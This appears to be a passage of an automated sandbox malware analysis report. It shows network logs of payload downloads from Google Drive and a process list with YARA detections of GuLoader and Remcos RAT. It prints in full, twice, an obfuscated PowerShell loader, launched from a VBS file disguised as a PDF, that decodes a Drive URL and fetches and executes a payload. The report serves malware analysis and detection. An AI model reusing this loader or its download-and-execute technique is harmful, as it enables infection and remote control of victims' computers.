                  2024-10-01 05:45:56 UTC | 233 | OUT | GET /download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: drive.usercontent.google.com
                  Connection: Keep-Alive
                  2024-10-01 05:45:58 UTC | 4858 | IN | HTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Content-Security-Policy: sandbox
                  Content-Security-Policy: default-src 'none'
                  Content-Security-Policy: frame-ancestors 'none'
                  X-Content-Security-Policy: sandbox
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Resource-Policy: same-site
                  X-Content-Type-Options: nosniff
                  Content-Disposition: attachment; filename="Forgabelsernes.dsp"
                  Access-Control-Allow-Origin: *
                  Access-Control-Allow-Credentials: false
                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                  Accept-Ranges: bytes
                  Content-Length: 418636
                  Last-Modified: Mon, 30 Sep 2024 09:10:20 GMT
                  X-GUploader-UploadID: AD-8ljvPQk2tbpAqCrU65rk671DlT7lVgWgWVDAHclRM2e3AXtoJ3KF7lAKWztlFQ-BklYkPUnrWP8hOWg
                  Date: Tue, 01 Oct 2024 05:45:58 GMT
                  Expires: Tue, 01 Oct 2024 05:45:58 GMT
                  Cache-Control: private, max-age=0
                  X-Goog-Hash: crc32c=KtAZFA==
                  Server: UploadServer
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.8 | 49708 | 172.217.16.206 | 443 | 3136 | C:\Windows\SysWOW64\msiexec.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-10-01 05:46:28 UTC | 216 | OUT | GET /uc?export=download&id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: drive.google.com
                  Cache-Control: no-cache
                  2024-10-01 05:46:28 UTC | 1610 | IN | HTTP/1.1 303 See Other
                  Content-Type: application/binary
                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                  Pragma: no-cache
                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                  Date: Tue, 01 Oct 2024 05:46:28 GMT
                  Location: https://drive.usercontent.google.com/download?id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd&export=download
                  Strict-Transport-Security: max-age=31536000
                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                  Cross-Origin-Opener-Policy: same-origin
                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                  Content-Security-Policy: script-src 'nonce-2tk-tAvfavLzjcj15EwVxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                  Server: ESF
                  Content-Length: 0
                  X-XSS-Protection: 0
                  X-Frame-Options: SAMEORIGIN
                  X-Content-Type-Options: nosniff
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  3 | 192.168.2.8 | 49709 | 142.250.184.193 | 443 | 3136 | C:\Windows\SysWOW64\msiexec.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-10-01 05:46:29 UTC | 258 | OUT | GET /download?id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd&export=download HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Cache-Control: no-cache
                  Host: drive.usercontent.google.com
                  Connection: Keep-Alive
                  2024-10-01 05:46:32 UTC | 4860 | IN | HTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Content-Security-Policy: sandbox
                  Content-Security-Policy: default-src 'none'
                  Content-Security-Policy: frame-ancestors 'none'
                  X-Content-Security-Policy: sandbox
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Resource-Policy: same-site
                  X-Content-Type-Options: nosniff
                  Content-Disposition: attachment; filename="CONrJpEPIFtKwb90.bin"
                  Access-Control-Allow-Origin: *
                  Access-Control-Allow-Credentials: false
                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                  Accept-Ranges: bytes
                  Content-Length: 494656
                  Last-Modified: Mon, 30 Sep 2024 09:08:59 GMT
                  X-GUploader-UploadID: AD-8ljvYGCBQq_TsSb5Ds1UaQhN1RDNnTkX7Q-UhxS40TF3ME6l-pJx9EDWSjcDNYQCUEvMojyMrZAKhOw
                  Date: Tue, 01 Oct 2024 05:46:32 GMT
                  Expires: Tue, 01 Oct 2024 05:46:32 GMT
                  Cache-Control: private, max-age=0
                  X-Goog-Hash: crc32c=9RQZ4w==
                  Server: UploadServer
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close



                  Target ID:0
                  Start time:01:45:45
                  Start date:01/10/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs"
                  Imagebase:0x7ff69d450000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:01:45:47
                  Start date:01/10/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. 
X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl PrecTBill ySkr.bpLdreceNavne] rodu: Prpa:Cos.uTPecullBecrisCorre1Pikan2M cac ');$Exaltations=$Seriately[0];$Nongratifying=(Omhng120 'Songo$ AlumgM slyl RidsOStedmBRadioADel.nLOutpe:d skod O diy CaddeChampmMy coawindskPortaiSh ngN ccengSquad=ContaNPal ee BoerwGa,le- askOEtrusbP ppaJ postepursuCOran TBirac Arla sDrayiyt mposNonexTBo igeDruckmDiaki. 
BetinSlyngeVu.tuTRin e.VakuuwGanjaEOligabTils,cPirusLIntuiiDumdretrichnSkylltEndos ');Stungen ($Nongratifying);Stungen (Omhng120 'Donkr$ Int DPos ty MisteAncismTac.ya CounkFremeiSoftnnSubskgtwa d. iltrHCollieP steaUno edNa.opeumba ranodesRmega[Misto$SarifOMultidGlo,se RondlColomeCharat Medb]Front= List$ .aktATaktat OvertStra.r KlipiGlaurbPiratuOvonit stanvinde r CruodSpot iT.teleHous,rBeta nutense Reag ');$indledningers=Omhng120 'Inter$ .urpD L,ddyUnde eUncoummisdoaPer ek stofi.ebninjesuigG mcr. AlviD umfooDecenw ndsntevanlModneoMa agaKolbedSoldeF HeliiUn.nel Imdee riv( Kont$LektuEMavesx BinaaSkak.lXyloftInteraInjektTv reiMandjoFlippn Forms orag, gi t$SrklaMKrakee c epgBlamaaUnstar IjmaaInsti)psyko ';$Megara=$Istandsttende;Stungen (Omhng120 'Ndtrf$ ouquG tooll rikiOAlmacBOpfriaToothlProd :GefilD Inteo BesiNTyphousoci tBitniSLaman= njoi(gmelitResurEBaandsFlas,t Ildr-otozop AddraB,styt omfrHPeasa Chaws$TrnermBl baEBrideGBeroeaBlyglrAfsteABland)Omfo, ');while (!$Donuts) {Stungen (Omhng120 'Delef$JentrgRiflilKem koColosbUnsu a Schel exah:HvlviDBec siFrontdP ecrySesqunListeaUdfldmSucrai GaveaThion=Udrad$.utoltOmbytrfrogfu.lleseW,yme ') ;Stungen $indledningers;Stungen (Omhng120 'StiffSPreobtColosaLaeotrS tratChiff- UdasSVouchlJews eSepale opplpBinds Abote4Leads ');Stungen (Omhng120 'Hastv$T.ikogOve flL veroJ,nglbDeadwa selelOmgng:Asse DHvneroStemnnMang,uOwnsutLakfasPri,r= U ex(bo igT PacheCiff sOv.rptOldeb-Pa,esP ChiaaUl entU sanhUse e To on$ UnguM VermeGenkog BlodaF,dlar adioaRasor)Obers ') ;Stungen (Omhng120 'Overs$Utakng AllelCl,sso Bu,nbForlaa VedllForha:RevirT ,ouraNonsem Ro deHayag= Med $Telefg WiltlmoutooHetaebel,owaIndf,lmonos: EnerFHandsiSiks lPretrmLun rsDromot summr Derbi EctomPoli mPhotoeOve,nlHuers+Acina+Disbe%Under$,andsS ungeeUnb arReseriAccu.a Gen tunhare fblalSlummyAnt.r.LaramcSmallo SkyduAfskrnSybiltMaves ') ;$Exaltations=$Seriately[$Tame];}$Eksekverbare=282308;$trikstank=31667;Stungen (Omhng120 'C rom$ motigCirculTagryoMiliebForloaG.bbel S 
pr:NonemJBlacku Eftel orudeAllerm BluneForbis puppsNoveme LrernidiomsWab,t Repe=Akupu .aatGAdelseAandftGen r- maniCInsinoGrnsen EgentL,tbee reennFraflt ndel Unr p$.outiMro aieOpkalgGutsiaPilferKle oa She, ');Stungen (Omhng120 ' ore$Forsvgtmmerl Ens o CarbbPseudaRkkevlBev s:FormaEAspacxS ptopC rkelFriediFj rncFlyn aSunfibSvaeriLokall Nippi roustBlaahyTopsp rind=W shi Retor[ xureSNotoryTil.ys salvtContaeEmanumneote.KefsfCAu tlo.odifnHyn,sv Reole DamprL.gkatNumbb]Skatt:Proec:MetteFF dusrSkitsoChargmInterBBe liaStvnisforfeeCro.k6 egle4 itheSFrosttLatherAmpleiAblatnPrologPalae(Belam$ Au oJDe maustranlGoyineEndotmCommieSeggas ecisMali.e NectnAntics Akti)Besla ');Stungen (Omhng120 'Missu$SubvegfravrlTaksto portb Re saNinetlGalvv:Leg nTFlymehTrapioEnh dmCordiiBrugesD cklt Ac u Uddan=Confi Afpa[ MetaS Ect y Genes.ipsot harie rdomm Stev.Musk,TOmproeSek nx Othatindkr. SecaEAlv onEctrocOrigioErkyndBryoniSneadnVillig ,ntr]Soci :rgneh:StilmABrnepS ynonCP.laeISaracIBetj .SeersGUndereEnwrit pannS Umrktbassar trici otanGamb g over( Coxe$DrapeE Se uxN,nmapCranilFerdyiSleigcKamgaaAdaptb Gappi.aabul Tek iFolket DiacyDisco) Farv ');Stungen (Omhng120 'Samme$CircugTasselVens.oRhi ebS elnaBothilThaum:HvidkoHoggepMolalsMet gt BesktO teaeIndbanGonord StateDem t=Downv$DisemTNaturhUn raoBagr.mPersoiSprkfs Blegt M zz.Hove.sDe,umuanstrbEmbiosJydettOptakrT staiBeslanRsonngP haw( .iva$TanisE R.mpkLymphsHu hjedaakakD shevVrvleeHeracrSubcob So aa A derSamleeParti, apot$Laze.tM diarShoppi Foolk fluisForgat ver aUndernportskD,tal)Echiu ');Stungen $opsttende;"
                  Imagebase:0x7ff6cb6b0000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:01:45:47
                  Start date:01/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6ee680000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:01:46:02
                  Start date:01/10/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. 
X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl PrecTBill ySkr.bpLdreceNavne] rodu: Prpa:Cos.uTPecullBecrisCorre1Pikan2M cac ');$Exaltations=$Seriately[0];$Nongratifying=(Omhng120 'Songo$ AlumgM slyl RidsOStedmBRadioADel.nLOutpe:d skod O diy CaddeChampmMy coawindskPortaiSh ngN ccengSquad=ContaNPal ee BoerwGa,le- askOEtrusbP ppaJ postepursuCOran TBirac Arla sDrayiyt mposNonexTBo igeDruckmDiaki. 
BetinSlyngeVu.tuTRin e.VakuuwGanjaEOligabTils,cPirusLIntuiiDumdretrichnSkylltEndos ');Stungen ($Nongratifying);Stungen (Omhng120 'Donkr$ Int DPos ty MisteAncismTac.ya CounkFremeiSoftnnSubskgtwa d. iltrHCollieP steaUno edNa.opeumba ranodesRmega[Misto$SarifOMultidGlo,se RondlColomeCharat Medb]Front= List$ .aktATaktat OvertStra.r KlipiGlaurbPiratuOvonit stanvinde r CruodSpot iT.teleHous,rBeta nutense Reag ');$indledningers=Omhng120 'Inter$ .urpD L,ddyUnde eUncoummisdoaPer ek stofi.ebninjesuigG mcr. AlviD umfooDecenw ndsntevanlModneoMa agaKolbedSoldeF HeliiUn.nel Imdee riv( Kont$LektuEMavesx BinaaSkak.lXyloftInteraInjektTv reiMandjoFlippn Forms orag, gi t$SrklaMKrakee c epgBlamaaUnstar IjmaaInsti)psyko ';$Megara=$Istandsttende;Stungen (Omhng120 'Ndtrf$ ouquG tooll rikiOAlmacBOpfriaToothlProd :GefilD Inteo BesiNTyphousoci tBitniSLaman= njoi(gmelitResurEBaandsFlas,t Ildr-otozop AddraB,styt omfrHPeasa Chaws$TrnermBl baEBrideGBeroeaBlyglrAfsteABland)Omfo, ');while (!$Donuts) {Stungen (Omhng120 'Delef$JentrgRiflilKem koColosbUnsu a Schel exah:HvlviDBec siFrontdP ecrySesqunListeaUdfldmSucrai GaveaThion=Udrad$.utoltOmbytrfrogfu.lleseW,yme ') ;Stungen $indledningers;Stungen (Omhng120 'StiffSPreobtColosaLaeotrS tratChiff- UdasSVouchlJews eSepale opplpBinds Abote4Leads ');Stungen (Omhng120 'Hastv$T.ikogOve flL veroJ,nglbDeadwa selelOmgng:Asse DHvneroStemnnMang,uOwnsutLakfasPri,r= U ex(bo igT PacheCiff sOv.rptOldeb-Pa,esP ChiaaUl entU sanhUse e To on$ UnguM VermeGenkog BlodaF,dlar adioaRasor)Obers ') ;Stungen (Omhng120 'Overs$Utakng AllelCl,sso Bu,nbForlaa VedllForha:RevirT ,ouraNonsem Ro deHayag= Med $Telefg WiltlmoutooHetaebel,owaIndf,lmonos: EnerFHandsiSiks lPretrmLun rsDromot summr Derbi EctomPoli mPhotoeOve,nlHuers+Acina+Disbe%Under$,andsS ungeeUnb arReseriAccu.a Gen tunhare fblalSlummyAnt.r.LaramcSmallo SkyduAfskrnSybiltMaves ') ;$Exaltations=$Seriately[$Tame];}$Eksekverbare=282308;$trikstank=31667;Stungen (Omhng120 'C rom$ motigCirculTagryoMiliebForloaG.bbel S 
pr:NonemJBlacku Eftel orudeAllerm BluneForbis puppsNoveme LrernidiomsWab,t Repe=Akupu .aatGAdelseAandftGen r- maniCInsinoGrnsen EgentL,tbee reennFraflt ndel Unr p$.outiMro aieOpkalgGutsiaPilferKle oa She, ');Stungen (Omhng120 ' ore$Forsvgtmmerl Ens o CarbbPseudaRkkevlBev s:FormaEAspacxS ptopC rkelFriediFj rncFlyn aSunfibSvaeriLokall Nippi roustBlaahyTopsp rind=W shi Retor[ xureSNotoryTil.ys salvtContaeEmanumneote.KefsfCAu tlo.odifnHyn,sv Reole DamprL.gkatNumbb]Skatt:Proec:MetteFF dusrSkitsoChargmInterBBe liaStvnisforfeeCro.k6 egle4 itheSFrosttLatherAmpleiAblatnPrologPalae(Belam$ Au oJDe maustranlGoyineEndotmCommieSeggas ecisMali.e NectnAntics Akti)Besla ');Stungen (Omhng120 'Missu$SubvegfravrlTaksto portb Re saNinetlGalvv:Leg nTFlymehTrapioEnh dmCordiiBrugesD cklt Ac u Uddan=Confi Afpa[ MetaS Ect y Genes.ipsot harie rdomm Stev.Musk,TOmproeSek nx Othatindkr. SecaEAlv onEctrocOrigioErkyndBryoniSneadnVillig ,ntr]Soci :rgneh:StilmABrnepS ynonCP.laeISaracIBetj .SeersGUndereEnwrit pannS Umrktbassar trici otanGamb g over( Coxe$DrapeE Se uxN,nmapCranilFerdyiSleigcKamgaaAdaptb Gappi.aabul Tek iFolket DiacyDisco) Farv ');Stungen (Omhng120 'Samme$CircugTasselVens.oRhi ebS elnaBothilThaum:HvidkoHoggepMolalsMet gt BesktO teaeIndbanGonord StateDem t=Downv$DisemTNaturhUn raoBagr.mPersoiSprkfs Blegt M zz.Hove.sDe,umuanstrbEmbiosJydettOptakrT staiBeslanRsonngP haw( .iva$TanisE R.mpkLymphsHu hjedaakakD shevVrvleeHeracrSubcob So aa A derSamleeParti, apot$Laze.tM diarShoppi Foolk fluisForgat ver aUndernportskD,tal)Echiu ');Stungen $opsttende;"
                  Imagebase:0xfa0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1924109372.0000000008CF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1906272544.000000000611D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1930442779.000000000BDEC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:01:46:02
                  Start date:01/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6ee680000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:01:46:19
                  Start date:01/10/2024
                  Path:C:\Windows\SysWOW64\msiexec.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\syswow64\msiexec.exe"
                  Imagebase:0x3c0000
                  File size:59'904 bytes
                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:01:46:32
                  Start date:01/10/2024
                  Path:C:\Windows\SysWOW64\msiexec.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                  Imagebase:0x3c0000
                  File size:59'904 bytes
                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
